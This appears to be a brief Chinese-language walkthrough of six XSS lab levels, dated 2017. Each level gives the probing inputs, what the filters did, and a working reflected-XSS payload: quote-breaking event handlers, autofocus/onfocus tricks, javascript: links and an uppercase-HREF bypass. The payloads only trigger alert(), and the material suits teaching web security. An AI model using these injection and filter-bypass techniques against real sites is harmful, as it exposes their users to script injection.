1.
有显示位,尝试直接使用
payload:?name=<script>alert(12);</script>
2.
发现有两个显示位
- 第一个在<h1></h1>
标签对里,发现已经被过滤
- 第二个显示位在输入框里,尝试闭合双引号
设置自动聚焦,当聚焦时弹窗,成功
payload:?keyword=1" autofocus onfocus="javascript:alert(123)"
3.
尝试输入:检测XSS注入">XSS TEST
查看源代码:发现没有成功闭合双引号,尝试'>XSS TEST
查看源代码,发现成功闭合 并且转义了 ‘>’
输入:XSS' autofocus onfocus=javascript:alert() '
PayLoad:XSS'+autofocus+onfocus=javascript:alert()+'
4.
输入:">XSS
发现成功闭合双引号,且过滤了>
输入:" onfocus=javascript:alert()
查看源码,发现多了一个双引号,尝试后面加个空格,发现成功注入
PayLoad:" onfocus=javascript:alert()
5.
输入:"'><script>alert()</script>
发现可以成功闭合双引号,还有标签对,此外将script转换成scr_ipt
再次尝试加入onfocus和onclick时,同样,on之间加入了下划线
尝试使用' "><a href=javascript:alert()>123</a>
点击超链接123,成功弹窗。
PayLoad:' "><a href=javascript:alert()>123</a>
6.
同上一题,发现将href转换成了hr_ef,尝试使用大写HREF,成功绕过。
PayLoad:' "><a HREF=javascript:alert()>123</a>
2017/11/15 13:21